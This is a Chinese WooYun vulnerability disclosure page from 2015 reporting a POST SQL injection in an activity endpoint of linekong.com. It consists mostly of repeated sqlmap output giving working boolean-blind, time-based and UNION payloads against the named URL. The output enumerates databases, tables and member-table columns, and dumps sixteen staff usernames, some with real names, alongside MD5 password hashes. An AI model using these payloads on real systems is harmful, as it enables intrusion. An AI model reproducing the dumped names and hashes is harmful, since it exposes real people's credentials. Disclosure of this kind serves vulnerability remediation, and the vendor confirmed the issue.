蓝港某分站SQL注入（post） | wooyun-2015-0119668| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119668

漏洞标题：蓝港某分站SQL注入（post）

漏洞作者：路人甲

提交时间：2015-06-11 11:23

修复时间：2015-07-30 09:54

公开时间：2015-07-30 09:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-11：细节已通知厂商并且等待厂商处理中
2015-06-15：厂商已经确认，细节仅向厂商公开
2015-06-25：细节向核心白帽子及相关领域专家公开
2015-07-05：细节向普通白帽子公开
2015-07-15：细节向实习白帽子公开
2015-07-30：细节向公众公开

简要描述：

详细说明：

http://ms.linekong.com/activity/clan3/_do_getPlayerList.ajax.php
post参数ghId=1&page=1

sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- 
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] ms_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
[57 tables]
+---------------------------------------+
| ms_activity_17173                     |
| ms_activity_aprilpromotion_gift       |
| ms_activity_aprilpromotion_gift_count |
| ms_activity_aprilpromotion_register   |
| ms_activity_clan2_gh                  |
| ms_activity_clan2_join_log            |
| ms_activity_clan3_gh                  |
| ms_activity_clan3_join_log            |
| ms_activity_clan3_survey              |
| ms_activity_clan_gh                   |
| ms_activity_clan_join_log             |
| ms_activity_gh_member                 |
| ms_activity_jh_lottery                |
| ms_activity_jh_survey                 |
| ms_activity_laborday                  |
| ms_activity_name2_log                 |
| ms_activity_name3_log                 |
| ms_activity_name_log                  |
| ms_activity_signin_log                |
| ms_activity_spread                    |
| ms_activity_spread_log                |
| ms_activity_surveyjh_code             |
| ms_activity_surveyjh_log              |
| ms_activity_surveyjh_option           |
| ms_activity_surveyjh_votes            |
| ms_activity_voting_log                |
| ms_address                            |
| ms_article                            |
| ms_article_inserl                     |
| ms_build                              |
| ms_channel                            |
| ms_columns                            |
| ms_comment                            |
| ms_download                           |
| ms_editors_inserl                     |
| ms_flash                              |
| ms_grading                            |
| ms_group                              |
| ms_image                              |
| ms_image_inserl                       |
| ms_lottery_YYexchange                 |
| ms_lottery_exchange                   |
| ms_member                             |
| ms_pass_card_list                     |
| ms_pass_card_list_log                 |
| ms_passportstat                       |
| ms_sort                               |
| ms_template                           |
| ms_url                                |
| ms_url_inserl                         |
| ms_vote                               |
| ms_vote_inserl                        |
| ms_vote_option                        |
| ms_wj_article                         |
| ms_wj_article_inserl                  |
| ms_wj_image                           |
| ms_wj_image_inserl                    |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
Table: ms_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
Table: ms_member
[16 entries]
+------------+-----------+----------------------------------+
| nickname   | user_name | user_passwd                      |
+------------+-----------+----------------------------------+
| doyo       | doyo      | 862f3760ca3293437b53cac01b0ffe29 |
| sc         | 邵辰        | d54185b71f614c30a396ac4bc44d3269 |
| shixi      | 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| liuzg      | 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| tech       | 运维值班工程师   | de61d9913528e5cc7c0668ad72f53730 |
| lz         | 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| hanwangnan | 韩旺楠       | bd95ee66e3ac8410d69a1d23e6e740ef |
| genganna   | 耿安娜       | ad0804967b44d8185764c44e983b3e2d |
| xietang    | 谢唐        | 4297f44b13955235245b2497399d7a93 |
| gc         | 耿超        | a3973867cdfb643f4b10526c25875928 |
| flz        | 付立忠       | 4297f44b13955235245b2497399d7a93 |
| mjd        | 马俊东       | 1d62113b2b7ca6f834dd623320b988d3 |
| zc         | 张晨        | 92a870e23eaac7b3c576e91b807f2a60 |
| yangzhu    | 杨祝        | b5feae60bfe9b16d31639ac64a293b6c |
| lzf        | 刘震方       | 69f8d4a98ed0af08960d20dd954f9e45 |
| hmq        | 黄孟琪       | 471c75ee6643a10934502bdafee198fb |
+------------+-----------+----------------------------------+

漏洞证明：

sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- 
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] ms_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
[57 tables]
+---------------------------------------+
| ms_activity_17173                     |
| ms_activity_aprilpromotion_gift       |
| ms_activity_aprilpromotion_gift_count |
| ms_activity_aprilpromotion_register   |
| ms_activity_clan2_gh                  |
| ms_activity_clan2_join_log            |
| ms_activity_clan3_gh                  |
| ms_activity_clan3_join_log            |
| ms_activity_clan3_survey              |
| ms_activity_clan_gh                   |
| ms_activity_clan_join_log             |
| ms_activity_gh_member                 |
| ms_activity_jh_lottery                |
| ms_activity_jh_survey                 |
| ms_activity_laborday                  |
| ms_activity_name2_log                 |
| ms_activity_name3_log                 |
| ms_activity_name_log                  |
| ms_activity_signin_log                |
| ms_activity_spread                    |
| ms_activity_spread_log                |
| ms_activity_surveyjh_code             |
| ms_activity_surveyjh_log              |
| ms_activity_surveyjh_option           |
| ms_activity_surveyjh_votes            |
| ms_activity_voting_log                |
| ms_address                            |
| ms_article                            |
| ms_article_inserl                     |
| ms_build                              |
| ms_channel                            |
| ms_columns                            |
| ms_comment                            |
| ms_download                           |
| ms_editors_inserl                     |
| ms_flash                              |
| ms_grading                            |
| ms_group                              |
| ms_image                              |
| ms_image_inserl                       |
| ms_lottery_YYexchange                 |
| ms_lottery_exchange                   |
| ms_member                             |
| ms_pass_card_list                     |
| ms_pass_card_list_log                 |
| ms_passportstat                       |
| ms_sort                               |
| ms_template                           |
| ms_url                                |
| ms_url_inserl                         |
| ms_vote                               |
| ms_vote_inserl                        |
| ms_vote_option                        |
| ms_wj_article                         |
| ms_wj_article_inserl                  |
| ms_wj_image                           |
| ms_wj_image_inserl                    |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
Table: ms_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- 
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
Table: ms_member
[16 entries]
+------------+-----------+----------------------------------+
| nickname   | user_name | user_passwd                      |
+------------+-----------+----------------------------------+
| doyo       | doyo      | 862f3760ca3293437b53cac01b0ffe29 |
| sc         | 邵辰        | d54185b71f614c30a396ac4bc44d3269 |
| shixi      | 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| liuzg      | 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| tech       | 运维值班工程师   | de61d9913528e5cc7c0668ad72f53730 |
| lz         | 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| hanwangnan | 韩旺楠       | bd95ee66e3ac8410d69a1d23e6e740ef |
| genganna   | 耿安娜       | ad0804967b44d8185764c44e983b3e2d |
| xietang    | 谢唐        | 4297f44b13955235245b2497399d7a93 |
| gc         | 耿超        | a3973867cdfb643f4b10526c25875928 |
| flz        | 付立忠       | 4297f44b13955235245b2497399d7a93 |
| mjd        | 马俊东       | 1d62113b2b7ca6f834dd623320b988d3 |
| zc         | 张晨        | 92a870e23eaac7b3c576e91b807f2a60 |
| yangzhu    | 杨祝        | b5feae60bfe9b16d31639ac64a293b6c |
| lzf        | 刘震方       | 69f8d4a98ed0af08960d20dd954f9e45 |
| hmq        | 黄孟琪       | 471c75ee6643a10934502bdafee198fb |
+------------+-----------+----------------------------------+

修复方案：

参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-06-15 09:52

厂商回复：

感谢指出的问题，已将问题转交给开发人员处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119668

漏洞标题：蓝港某分站SQL注入（post）

相关厂商：linekong.com

漏洞作者：路人甲

提交时间：2015-06-11 11:23

修复时间：2015-07-30 09:54

公开时间：2015-07-30 09:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0119668

漏洞标题：蓝港某分站SQL注入（post）

相关厂商：linekong.com

漏洞作者： 路人甲

提交时间：2015-06-11 11:23

修复时间：2015-07-30 09:54

公开时间：2015-07-30 09:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0119668"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云